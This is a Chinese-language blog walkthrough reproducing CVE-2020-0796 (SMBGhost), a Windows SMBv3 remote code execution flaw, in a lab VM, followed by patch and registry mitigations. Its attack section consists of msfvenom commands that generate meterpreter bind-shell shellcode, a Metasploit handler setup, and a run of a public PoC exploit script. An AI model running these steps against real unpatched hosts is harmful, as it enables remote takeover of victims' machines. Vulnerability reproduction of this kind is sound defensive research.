其他
CVE-2020-0796:微软 SMBv3 协议RCE复现
本文字数:940阅读时长:3~4min声明:请勿用作违法用途,否则后果自负
适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于x64的系统) Windows 10 1903版(用于基于ARM64的系统) Windows Server 1903版(服务器核心安装) 适用于32位系统的Windows 10版本1909 Windows 10版本1909(用于基于x64的系统) Windows 10 1909版(用于基于ARM64的系统) Windows Server版本1909(服务器核心安装)
可在虚拟机中搭建win10系统来进行复现。迅雷链接:
ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/
https://github.com/chompie1337/SMBGhost_RCE_PoC
msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
msf5 exploit(multi/handler) > set rhost 192.168.1.103 #设置目标靶机IP地址
msf5 exploit(multi/handler) > set lport 3333 #设置监听端口
msf5 exploit(multi/handler) > exploit
python3 exploit.py -ip 192.168.31.137
即可看到msf中收到了回显成功连接
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0796
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 –Force
此外你还可以通过禁止SMB的流量流向外网来防御攻击。
参考链接:
https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
https://mp.weixin.qq.com/s/Nfx_UybY0M0x3C8tKND0zQ
Timeline Sec 团队
安全路上,与你并肩前行